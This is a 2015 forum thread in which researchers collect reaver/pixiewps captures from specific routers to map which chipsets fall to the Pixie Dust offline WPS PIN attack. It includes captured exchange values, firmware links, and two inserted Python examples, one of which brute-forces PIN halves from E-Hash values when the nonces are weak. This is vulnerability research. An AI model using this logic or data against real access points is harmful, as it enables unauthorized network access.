[P] WPS Model Name: Linksys Wireless Router
[P] WPS Model Number: WRT110
[P] Access Point Serial Number: 12345678

CPU1: Ralink RT2780

wikidevi (https://wikidevi.com/wiki/Linksys_WRT110)

Ahh thanks I was waiting for someone to confirm it.

emsef
2015-05-26, 21:30
Hello and thanks for the info.

The following router is vulnerable


[P] WPS Manufacturer: BUFFALO INC.
[P] WPS Model Name: WBMR-HP-GN
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678

https://wikidevi.com/wiki/Buffalo_WBMR-HP-GN

soxrok2212
2015-05-26, 22:57
Hello and thanks for the info.

The following router is vulnerable


[P] WPS Manufacturer: BUFFALO INC.
[P] WPS Model Name: WBMR-HP-GN
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678

https://wikidevi.com/wiki/Buffalo_WBMR-HP-GN

Thanks buddy, added to the database :) Keep up the testing and paste any vulnerable/non vulnerable devices with all the request info if possible :D A big thanks to the community! Wouldn't have been inspired without you!

kcdtv
2015-05-28, 13:15
the only reason we're able to get the pin now is because we assume ES-1 = ES-2 = 0. which really not much of "hacking". the only problem we are facing now, is someone needs to know how to write a code to find the state of the PRNG,
Hi there!
You missed some points.
In his presentation Dominique spoke about 2 flaws:
1) ES-1=ES-2=0 and that is just for Ralink chipsets and was indeed the first stuff that was coded (because, indeed, it doesn't require extra brute force of the seed)
2) Then wiire found the way to code the second breach revealed by Dominique: some broadcom devices for which we know the "interval" used to define the seed (cracked immediately)
In the meantime soxrok2212 sent to Dominique data from Realtek chipsets because we saw that the same PKE was used in his two routers and in my two routers with Realtek... all four routers from different manufacturers with different firmwares :p (but all is coming from the SDK for the rtl819x project that developers use to build their firmware)
And Dominique found out a third breach
3) for these Realtek chipsets the exact time in seconds is used as a seed in the DH key exchange process - or it is the time of the last build. (brute force required from the exact time (in seconds) back to 1970 < don't ask me why for some routers it was found that 1970 was used as seed)
wiire coded everything and we have all the stuff in hand to "pixie-dust" and also to create a custom code to try a different interval.
cheers
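As an added example (not code from pixiewps, reaver, or anyone in this thread), here is a toy model of the M3 commitment t6_x describes above (E-Hash = HMAC-SHA256 over the secret nonce, the PSK half, PKE and PKR) and of the Ralink flaw kcdtv lists as breach 1 (E-S1 = E-S2 = 0). AuthKey, PKE and PKR are constructed stand-ins (the DH derivation is stubbed); it shows why the secret nonces are the only thing keeping the M3 hashes from being checked against all 11,000 PIN halves offline.

```python
"""Toy model of the WPS M3 commitment and why secret-nonce entropy matters.
Constructed example: AuthKey, PKE and PKR are stand-ins, not captured values
(in WPS, AuthKey is derived from the DH shared secret and PKE/PKR are the
1536-bit DH public keys)."""
import hashlib
import hmac
import os

AUTHKEY = hashlib.sha256(b"constructed AuthKey stand-in").digest()  # 32 bytes
PKE = hashlib.sha512(b"constructed PKE stand-in").digest() * 3       # 192 bytes
PKR = hashlib.sha512(b"constructed PKR stand-in").digest() * 3       # 192 bytes
ZERO_NONCE = bytes(16)  # the Ralink-style E-S1 = E-S2 = 0 case from the thread


def wps_checksum_digit(pin7: str) -> str:
    """8th digit of a WPS PIN: weighted sum (3,1,3,1,3,1,3) over the first 7."""
    accum = sum((3 if i % 2 == 0 else 1) * int(ch) for i, ch in enumerate(pin7))
    return str((10 - accum % 10) % 10)


def psk_half(pin_half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, half of the PIN)."""
    return hmac.new(AUTHKEY, pin_half.encode(), hashlib.sha256).digest()[:16]


def e_hash(es: bytes, psk: bytes) -> bytes:
    """E-Hash as committed in M3: HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(AUTHKEY, es + psk + PKE + PKR, hashlib.sha256).digest()


def enrollee_m3(pin: str, es1: bytes, es2: bytes):
    """E-Hash1/E-Hash2 the enrollee (the AP) sends in M3 for this PIN and nonces."""
    return e_hash(es1, psk_half(pin[:4])), e_hash(es2, psk_half(pin[4:]))


def offline_pin_check(ehash1: bytes, ehash2: bytes, es1_guess: bytes, es2_guess: bytes):
    """Test every PIN half against the M3 hashes using guessed secret nonces.

    Returns (pin, e_hash_evaluations). Succeeds only when the nonce guesses
    are right: with truly random 128-bit E-S1/E-S2 the guess is hopeless,
    which is the whole point of the nonces in the protocol."""
    evals = 0
    first = None
    for i in range(10_000):
        half = f"{i:04d}"
        evals += 1
        if hmac.compare_digest(e_hash(es1_guess, psk_half(half)), ehash1):
            first = half
            break
    if first is None:
        return None, evals
    for j in range(1_000):                      # last digit is the checksum
        half = f"{j:03d}"
        half += wps_checksum_digit(first + half)
        evals += 1
        if hmac.compare_digest(e_hash(es2_guess, psk_half(half)), ehash2):
            return first + half, evals
    return None, evals


def demo():
    """Same PIN, same offline check; only the enrollee's nonce quality differs."""
    pin = "1234567" + wps_checksum_digit("1234567")     # the well-known 12345670
    h1, h2 = enrollee_m3(pin, ZERO_NONCE, ZERO_NONCE)   # flawed enrollee
    weak = offline_pin_check(h1, h2, ZERO_NONCE, ZERO_NONCE)
    h1, h2 = enrollee_m3(pin, os.urandom(16), os.urandom(16))  # proper nonces
    strong = offline_pin_check(h1, h2, ZERO_NONCE, ZERO_NONCE)
    return weak, strong


if __name__ == "__main__":
    (found, n), (miss, m) = demo()
    print(f"zero nonces:   recovered {found} after {n} E-Hash evaluations")
    print(f"random nonces: recovered {miss} after {m} E-Hash evaluations")
```

With the zero nonces the first half matches on the 1235th evaluation and the second on the 568th; with random nonces the same check exhausts all 10,000 first halves and finds nothing, which is what a properly implemented enrollee should look like.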

WaLkZ
2015-05-29, 22:08
Invulnerable


[P] E-Nonce: aa:90:80:28:ea:8e:89:cc:03:4a:ad:df:8e:87:02:26
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Name: Wi-Fi Protected Setup Router
[P] WPS Model Number: RT-AC56U
[P] Access Point Serial Number: d8:50:e6:da:0f:08
[P] R-Nonce: 0a:e6:39:ba:f9:44:27:bb:cb:94:8a:47:4c:8e:7b:78

Invulnerable


[P] E-Nonce: 5b:e0:19:5c:4c:76:2e:08:3f:1b:b5:f1:13:ae:29:36
[P] WPS Manufacturer:
[P] WPS Model Name: Wireless N Router
[P] WPS Model Number: DIR-501
[P] Access Point Serial Number: 20070413-0001
[P] R-Nonce: 03:e9:eb:c1:80:d9:63:10:d8:16:77:cf:fa:41:d4:5b

soxrok2212
2015-06-03, 15:55
Invulnerable


[P] E-Nonce: aa:90:80:28:ea:8e:89:cc:03:4a:ad:df:8e:87:02:26
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Name: Wi-Fi Protected Setup Router
[P] WPS Model Number: RT-AC56U
[P] Access Point Serial Number: d8:50:e6:da:0f:08
[P] R-Nonce: 0a:e6:39:ba:f9:44:27:bb:cb:94:8a:47:4c:8e:7b:78

Invulnerable


[P] E-Nonce: 5b:e0:19:5c:4c:76:2e:08:3f:1b:b5:f1:13:ae:29:36
[P] WPS Manufacturer:
[P] WPS Model Name: Wireless N Router
[P] WPS Model Number: DIR-501
[P] Access Point Serial Number: 20070413-0001
[P] R-Nonce: 03:e9:eb:c1:80:d9:63:10:d8:16:77:cf:fa:41:d4:5b

Hey buddy, the DIR-501 should've worked, I've had someone else report that it worked. Did you try a full brute force with pixiewps?

soxrok2212
2015-06-03, 16:50
Hey community, someone has recently brought to my and Wiire's attention an Atheros device that produces a strange E-Nonce, it follows this pattern:


xx:xx:00:00:00:00:00:00:00:00:00:00:00:00:00:00

where x is a hex character obviously (0-9, a-f).

It has occurred many times over different exchanges. It has happened in AR9130/AR9102 devices.

If E-S1 and E-S2 follow the same pattern, it would be a relatively fast crack for those chips, faster than the full Realtek bruteforce. It is not yet known if this is the case, but if anyone would like to contribute some data it couldn't hurt!

On the other hand, another Realtek chip was discovered to not use the time since Epoch PRNG, but it still follows the static PKE AND the E-Nonce follows a pattern like this:


xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00


It is a SoC, the RTL8671. Being a SoC, it might use a different PRNG but it may be just as vulnerable, if not even more vulnerable. There are a few people including me that are actively looking into it. I hope we find something soon!

stanke
2015-06-04, 15:56
Hey buddy, the DIR-501 should've worked, I've had someone else report that it worked. Did you try a full brute force with pixiewps?

Hello

For me the DIR-501 is also not working.
[P] E-Nonce: 51:a5:44:af:03:06:4e:0f:3e:c0:0b:b9:09:1b:c3:2c
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer:
[P] WPS Model Name: Wireless N Router
[P] WPS Model Number: DIR-501
[P] Access Point Serial Number: 20070413-0001
[+] Received M1 message
[P] R-Nonce: 4f:2b:f6:b7:08:bc:59:51:d7:b0:11:cb:0f:dd:8c:db
[P] PKR: 86:de:bf:e6:4a:ff:74:40:45:0f:91:5d:ff:a6:34:69:9e :1c:97:93:2e:48:c5:14:94:66:bd:f9:8b:59:44:4d:cc:9 7:bb:8e:41:f2:9f:47:f2:e1:f0:ad:2b:01:f7:1b:cb:04: 60:bd:d5:42:87:4d:75:dd:58:6c:6a:74:b5:c8:65:1d:09 :32:20:0b:e2:39:e9:49:1c:29:8a:d1:9f:18:bc:4b:7e:4 d:bd:db:e4:b9:9d:65:59:dd:51:c3:9d:9b:3e:5f:26:a1: 76:85:bd:4e:fc:de:ac:78:0d:57:f5:72:22:f7:16:9f:b8 :a7:f4:2c:4b:37:c8:3f:5f:9c:58:45:61:de:7b:17:ae:0 a:c8:e1:c3:30:a0:3c:7a:0d:e2:d8:9f:fe:04:a7:c3:7a: 42:c4:22:6a:32:02:2d:e5:ea:12:47:7c:06:1f:f4:62:11 :94:e4:09:3f:a3:8a:76:44:88:ed:fb:a4:ff:8b:0f:2a:0 c:b6:06:e0:0b:ca:05:ff:07
[P] AuthKey: 41:64:d3:91:09:11:8b:d1:f7:ec:21:6f:29:69:48:ba:0e :1e:9b:3e:26:c5:60:41:27:a9:69:da:12:7f:59:6e
[+] Sending M2 message
[P] E-Hash1: f6:63:0a:dd:2a:0c:e6:e3:e0:0d:76:98:35:6a:c9:14:89 :a8:3d:67:3b:5d:d2:08:ac:62:24:15:f7:e8:3d:8d
[P] E-Hash2: 76:29:da:24:1a:d8:d4:1b:b9:b4:c9:5f:3b:1c:19:28:81 :96:7a:40:f9:ac:d0:95:43:96:96:85:3c:18:49:d0
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 2 s
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.


Tried also with pixiewps --force. If you need some more testing please feel free to contact me.

someone_else
2015-06-05, 09:55
Here's a D-Link 501 (Version B) which works with --force :


[P] E-Nonce: 50:37:4c:db:7a:3c:16:90:4b:57:6a:43:61:c2:85:01
[P] R-Nonce: ae:9b:f2:26:29:23:38:17:0f:d3:7f:bd:92:fb:2d:3b
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: b5:4a:f2:45:95:44:27:92:f4:8b:65:05:6f:88:83:ff:d3 :20:fe:d9:ed:d8:e1:f0:52:3d:a9:95:2a:97:33:53:f4:7 2:66:30:83:90:8c:3c:58:81:ce:9f:7d:31:1b:04:a2:d2: ca:a6:7b:06:ca:15:97:f4:a5:e9:f5:ef:2e:2b:b7:fc:33 :1c:f7:44:01:80:20:a2:49:f4:54:5e:9d:11:49:e3:39:1 6:0e:45:e9:08:4d:7a:75:47:a0:a6:d1:4d:9e:ee:4a:d0: 69:e4:23:ef:5d:9f:d1:4b:34:19:ed:b4:77:95:81:3d:8a :6c:64:a3:f8:5d:d4:b1:89:00:da:65:9b:11:2b:20:5d:3 6:49:79:a9:25:b2:b6:26:0e:51:45:eb:4c:4a:f3:f1:b3: ac:e9:67:0a:fe:9a:b6:c8:60:75:a6:1f:2a:9b:51:1f:e2 :34:b0:78:64:f5:55:25:93:8b:37:d5:cf:74:fd:25:bd:4 3:cb:e4:e0:c7:a7:71:cf:8c
[P] AuthKey: 8e:7d:72:ef:1d:c3:ee:c5:4a:68:56:10:d5:60:d0:0b:62 :9c:d9:b1:2d:a0:a7:5c:da:81:38:fe:a4:b9:6b:4a
[P] E-Hash1: 90:b1:29:cf:44:fd:09:3a:74:7e:e1:fb:17:51:52:85:1a :41:26:30:bb:23:44:5d:53:b5:46:c4:5c:fa:1c:19
[P] E-Hash2: 43:d8:2a:15:c0:85:82:dc:32:1b:bf:04:47:15:73:56:fa :4a:f1:1c:13:6b:db:7a:0d:2e:fd:aa:37:96:44:7b

beddj
2015-06-06, 11:05
I have a Netgear R3600v2 router, Broadcom chipset BCM4360. Doesn't seem to be working. I can send a .cap if you want/need. Doing brute force now.

beddj
2015-06-06, 11:17
Netgear R3600v2 Broadcom BCM4360, doesn't seem to be working.

E-Nonce: 5b:44:ac:16:26:6f:78:42:7a:9b:b7:91:60:c5:62:87
[P] PKE: 01:fb:e7:b0:80:43:cc:24:6d:f6:9d:b8:9a:89:0e:d0:bb :0e:57:10:c9:d3:bc:c1:e8:a0:df:e6:61:3e:e9:4a:9f:7 0:cb:ac:0b:71:7a:0e:bd:10:2d:83:c2:a8:b4:c4:3c:53: 04:7e:a7:17:13:43:81:9a:6b:f6:b7:d6:0e:32:bb:bf:33 :ce:2e:ca:b6:1f:c3:48:39:77:69:63:80:99:11:78:0d:f 7:0c:39:3d:4c:87:fa:c7:22:9d:97:41:11:f7:c9:b5:20: 09:01:0b:4b:12:2c:88:cb:99:53:11:69:2f:48:3a:2d:f9 :8b:d6:20:7c:84:a5:b0:ad:71:12:4d:46:29:74:66:58:7 c:f7:fe:52:92:6c:e7:86:41:b5:20:e4:e6:b9:64:95:c6: 08:f5:c4:e1:5c:7e:bf:51:a3:e2:da:17:d9:d7:b5:38:be :a5:4f:30:e8:bb:10:51:f6:78:27:0d:51:1d:49:c3:38:2 a:3a:a8:2b:05:6c:72:80:49
[P] WPS Manufacturer: NETGEAR, Inc.
[P] WPS Model Name: R6300v2
[P] WPS Model Number: R6300v2
[P] Access Point Serial Number: 679
[+] Received M1 message
[P] R-Nonce: 2c:2a:4b:27:57:1d:b5:5f:6a:90:f0:9d:26:b7:10:28
[P] PKR: 43:4b:29:6c:ff:cb:c9:6f:5c:f6:6e:2c:35:25:8b:e8:a4 :1b:bc:b2:df:a8:10:8b:72:c6:b8:a2:0b:97:76:e4:47:6 6:6a:11:7a:b0:fd:75:3f:cd:17:8f:16:c6:7e:44:cd:aa: f8:fb:0f:91:80:e6:2c:31:91:a9:a5:84:4a:4a:de:31:c1 :65:1e:a6:57:28:41:91:3d:11:dc:81:2c:af:b9:2f:8b:e e:41:1c:3b:05:61:03:0b:07:b0:10:b6:90:25:09:fd:e9: 4e:ec:bb:f5:49:8f:5c:e1:7f:43:b8:e8:70:2c:cc:db:bd :6d:a4:12:3b:b6:1a:f5:dc:43:11:68:11:9e:eb:d2:67:b 5:ea:58:7f:f9:6a:63:f2:a6:f6:21:ed:06:9f:2e:42:41: e9:18:d6:a2:7d:b5:3e:1b:04:12:eb:de:c6:05:5b:40:a5 :02:b1:1a:54:6d:a6:b2:3f:71:5e:8a:b3:77:f4:b4:66:f 7:f5:75:3c:a2:31:8e:dd:b3
[P] AuthKey: 52:fd:cb:ad:ec:b8:a5:a5:5b:79:38:ca:c6:c5:8c:ef:5f :8b:be:6a:61:4c:b5:e0:19:a1:39:bf:84:fd:a4:18
[+] Sending M2 message
[P] E-Hash1: f3:27:0d:b1:97:6d:ba:83:18:25:44:d8:0f:34:64:09:da :ce:7c:19:b9:89:87:62:98:41:17:45:3d:e4:db:63
[P] E-Hash2: d7:5b:14:f3:a1:43:d2:0b:3c:59:07:ae:ee:c4:dc:2a:32 :a2:a4:fa:18:e5:b5:20:52:c5:85:dc:27:a6:84:6b

soxrok2212
2015-06-07, 03:04
Most Broadcom chipsets are not vulnerable because they run Linux, which uses a cryptographically secure method of generating random keys with good sources of entropy... it's pretty much completely unpredictable as of right now. In the future, something could certainly be found but not right now. The only Broadcom devices that will work are devices that run eCos, which are typically found in DSL/Wireless gateway modems or Cable modem/Gateways.

soxrok2212
2015-06-07, 04:31
Okay so 3 new things have been brought to my attention, some of which I've already pointed out but I just want to clear things up.
1- Someone recently e-mailed me about an Atheros device, specifically a D-Link DIR-600 rev A1. (https://wikidevi.com/wiki/D-Link_DIR-600_rev_A1) This device has an AR9285. A few months ago, the static PKE in Realtek devices made me question their implementation. Many of you know that PKE:


d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b


Well, it turns out that this device also has a static PKE!


91:72:d8:6a:3d:bc:4c:5b:89:c8:b9:86:ff:31:ee:96:b9 :bc:ab:ac:cc:1d:42:77:1d:46:09:a3:91:e3:b9:b2:c2:8 0:a3:2e:b4:01:58:36:f9:90:02:be:ab:94:69:31:38:4e: 84:d2:7a:06:7e:bb:f6:15:9b:08:a6:55:67:48:29:c1:b0 :69:fb:79:51:a8:d0:d5:bf:8d:65:58:71:4e:be:0d:33:6 8:30:87:04:7e:71:99:d1:26:e7:fa:8a:55:2a:b6:be:c5: 23:f6:87:c8:f8:bd:6c:77:0c:09:3f:40:83:64:90:35:47 :0f:b8:1b:6d:31:d5:3e:2f:35:7a:27:16:57:d8:1e:0c:8 b:41:f5:1c:3b:b0:31:f5:b0:d7:23:40:26:7b:ce:b5:fd: 07:c6:58:64:06:1a:45:55:4b:c4:ca:3b:50:57:bd:a0:fc :7c:69:7f:06:79:52:4e:30:1a:6d:f8:16:6e:1b:9f:51:9 7:e8:40:2f:9b:97:d1:7e:7e


I wasn't able to find source code for this specific model and unfortunately I can't find a firmware link either. Here is a list with all devices that use the AR9285 chip so the community can look to see if their devices follow the same pattern.

2- Another strange thing is happening with Atheros, specifically in the Linksys WRT160NL. (https://wikidevi.com/wiki/Linksys_WRT160NL) This is one of Linksys's devices that is completely open source, meaning it runs Linux. This WRT160NL has an AR9130/AR9102 chipset. The strange thing here is that the Enrollee Nonce follows a strange pattern:



XX:XX:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00


Usually, E-S1 and E-S2 are generated right after the Enrollee Nonce, so I'd bet there is some sort of issue here. Here is a download link (http://downloads.linksys.com/downloads/gplcode/1224701345638/WRT160NL_1.0.04.002.tar.gz) for the open source firmware and a list of AR9130/AR9102 devices (https://wikidevi.com/wiki/Special:Ask?title=Special%3AAsk&q=%3Cq%3E%3Cq%3E%5B%5BWI1+chip1+model::~AR9130*%5D %5D+%5B%5BWI1+802dot11+protocols::bgn%5D%5D%3C%2Fq %3E+OR+%3Cq%3E%5B%5BWI2+chip1+model::~AR9130*%5D%5 D+%5B%5BWI2+802dot11+protocols::bgn%5D%5D%3C%2Fq%3 E%3C%2Fq%3E&po=%3FEmbedded+system+type=Type%0D%0A%3FFCC+ID%0D% 0A%3FManuf%0D%0A%3FManuf+product+model=Manuf.+mdl% 0D%0A%3FCPU1+model=CPU1%0D%0A%3FCPU1+clock+speed%0 D%0A%3FFLA1+amount=FLA1%0D%0A%3FRAM1+amount=RAM1%0 D%0A%3FWI1+chip1+model=WI1+chip1%0D%0A%3FWI1+chip2 +model=WI1+chip2%0D%0A%3FWI1+MIMO+config=WI1+MIMO% 0D%0A%3FSupported+802dot11+protocols=PHY+modes%0D% 0A%3FOUI%0D%0A%3FOUI+(ethernet)=OUI+(Eth)%0D%0A%3F Estimated+year+of+release=Est.+year&eq=yes&p%5Bformat%5D=broadtable&order%5B0%5D=ASC&sort_num=&order_num=ASC&p%5Blimit%5D=500&p%5Boffset%5D=&p%5Blink%5D=all&p%5Bsort%5D=&p%5Bheaders%5D=show&p%5Bmainlabel%5D=&p%5Bintro%5D=&p%5Boutro%5D=&p%5Bsearchlabel%5D=…+further+results&p%5Bdefault%5D=&p%5Bclass%5D=sortable+wikitable+smwtable) for comparison against other devices.

3- Finally, another user pointed out a different Realtek chipset, the RTL8671 (as well as other SoC DSL/Wireless modems). I assume that since this chip is a SoC, it may use a different PRNG. The nonces follow another strange pattern that as of right now we haven't been able to determine. Here is the pattern:



00:00:XX:XX:00:00:XX:XX:00:00:XX:XX:00:00:XX:XX


There is a device that has been confirmed to follow this pattern, a DIGISOL DG-BG4100NU. The firmware can be downloaded and extracted with binwalk here (https://dl.dropboxusercontent.com/u/343477341/digisol/wireless_solutions/adsl_routers/dg-bg4100nu/firmware/DG-BG4100NU_A1_Firmware_11OCT2014.zip), and the source code for the RTL8186 chip can be found here. (http://sourceforge.net/projects/rtl8186/)

--I already know that Wiire, Datahead and I are looking into these but they are both very busy and I don't know enough C to read code and understand it completely. T6_x is also looking into some interesting stuff as well. I'm coming back to the community looking for help! Maybe we can do this one without Bongard! That is my goal this time, and it probably doesn't help to make this public but that's alright! Leave a reply if you have any questions or comments and thanks in advance!
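To make the two observations above (a static PKE and nonces with fixed zero bytes) concrete, here is an added example that is not code from this thread, Reaver or pixiewps: it takes several reaver M1 captures of the same AP and reports, per field, whether the value never changes and which nonce byte positions are always zero. The captures are constructed, and the PKE values are shortened stand-ins for the real 192-byte public key.

```python
"""Assess how random the WPS M1 fields (E-Nonce, PKE) of one AP look across
several captures. Added example; the captures below are constructed and the
PKE values are shortened stand-ins for the real 192-byte public key."""


def parse_hex(text):
    """Turn a reaver-style 'aa:bb:cc' string into bytes, ignoring the stray
    spaces that forum line-wrapping inserts into long values."""
    return bytes.fromhex(text.replace(":", "").replace(" ", ""))


def is_static(values):
    """True when a field never changes between captures. A public key that is
    static means the private DH exponent behind it is static as well."""
    return len(values) > 1 and all(v == values[0] for v in values)


def zero_template(values):
    """Render a template such as 'xx:xx:00:00:...': '00' where every capture
    has a zero byte in that position, 'xx' otherwise."""
    width = len(values[0])
    return ":".join(
        "00" if all(v[i] == 0 for v in values) else "xx" for i in range(width)
    )


def effective_bits(values):
    """Upper bound on the entropy of the field: 8 bits per byte position that
    is ever non-zero. (A real estimate needs many more captures than this.)"""
    return 8 * zero_template(values).count("xx")


def assess(captures):
    """captures: list of dicts mapping a field name to the hex string from
    reaver's '[P]' line. Returns one finding per field."""
    findings = {}
    for field in captures[0]:
        values = [parse_hex(c[field]) for c in captures]
        findings[field] = {
            "static": is_static(values),
            "template": zero_template(values),
            "effective_bits": effective_bits(values),
        }
    return findings


def report(captures):
    """Human-readable summary; returns the lines so they can be checked."""
    lines = []
    for field, f in assess(captures).items():
        if f["static"]:
            lines.append(f"{field}: STATIC")
        else:
            lines.append(f"{field}: {f['effective_bits']}-bit template {f['template']}")
    return lines


# Constructed captures mimicking the xx:xx:00:00 nonce pattern plus a static PKE.
WEAK_CAPTURES = [
    {"E-Nonce": "51:a5:00:00:03:06:00:00:3e:c0:00:00:09:1b:00:00",
     "PKE": "d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d"},
    {"E-Nonce": "4c:db:00:00:7a:3c:00:00:4b:57:00:00:61:c2:00:00",
     "PKE": "d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d"},
    {"E-Nonce": "ae:9b:00:00:29:23:00:00:0f:d3:00:00:92:fb:00:00",
     "PKE": "d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d"},
]

# Constructed captures from an AP whose nonce and public key change every run.
HEALTHY_CAPTURES = [
    {"E-Nonce": "9a:03:c7:41:5d:e2:88:1f:b6:2c:70:d9:4e:a5:36:8b",
     "PKE": "43:4b:29:6c:ff:cb:c9:6f:5c:f6:6e:2c:35:25:8b:e8"},
    {"E-Nonce": "17:f4:62:b9:0d:53:ca:2e:91:7c:e8:45:a0:3b:d6:5f",
     "PKE": "86:de:bf:e6:4a:ff:74:40:45:0f:91:5d:ff:a6:34:69"},
]


if __name__ == "__main__":
    for name, caps in (("weak", WEAK_CAPTURES), ("healthy", HEALTHY_CAPTURES)):
        print(name)
        for line in report(caps):
            print("  " + line)
```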

DetmL
2015-06-09, 05:03
Okay so 3 new things have been brought to my attention, some of which I've already pointed out but I just want to clear things up.
1- Someone recently e-mailed me about an Atheros device, specifically a D-Link DIR-600 rev A1. (https://wikidevi.com/wiki/D-Link_DIR-600_rev_A1) This device has an AR9285. A few months ago, the static PKE in Realtek devices made me question their implementation. Many of you know that PKE:


d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b


Well, it turns out that this device also has a static PKE!


91:72:d8:6a:3d:bc:4c:5b:89:c8:b9:86:ff:31:ee:96:b9 :bc:ab:ac:cc:1d:42:77:1d:46:09:a3:91:e3:b9:b2:c2:8 0:a3:2e:b4:01:58:36:f9:90:02:be:ab:94:69:31:38:4e: 84:d2:7a:06:7e:bb:f6:15:9b:08:a6:55:67:48:29:c1:b0 :69:fb:79:51:a8:d0:d5:bf:8d:65:58:71:4e:be:0d:33:6 8:30:87:04:7e:71:99:d1:26:e7:fa:8a:55:2a:b6:be:c5: 23:f6:87:c8:f8:bd:6c:77:0c:09:3f:40:83:64:90:35:47 :0f:b8:1b:6d:31:d5:3e:2f:35:7a:27:16:57:d8:1e:0c:8 b:41:f5:1c:3b:b0:31:f5:b0:d7:23:40:26:7b:ce:b5:fd: 07:c6:58:64:06:1a:45:55:4b:c4:ca:3b:50:57:bd:a0:fc :7c:69:7f:06:79:52:4e:30:1a:6d:f8:16:6e:1b:9f:51:9 7:e8:40:2f:9b:97:d1:7e:7e


I wasn't able to find source code for this specific model and unfortunately I can't find a firmware link either.
Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-600/REVA/DIR-600_FIRMWARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?

soxrok2212
2015-06-09, 14:54
Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-600/REVA/DIR-600_FIRMWARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?

Yeah I know about the PIN generator, but a chip based ATTACK would be more widespread and for other manufacturers as well.

soxrok2212
2015-06-09, 17:58
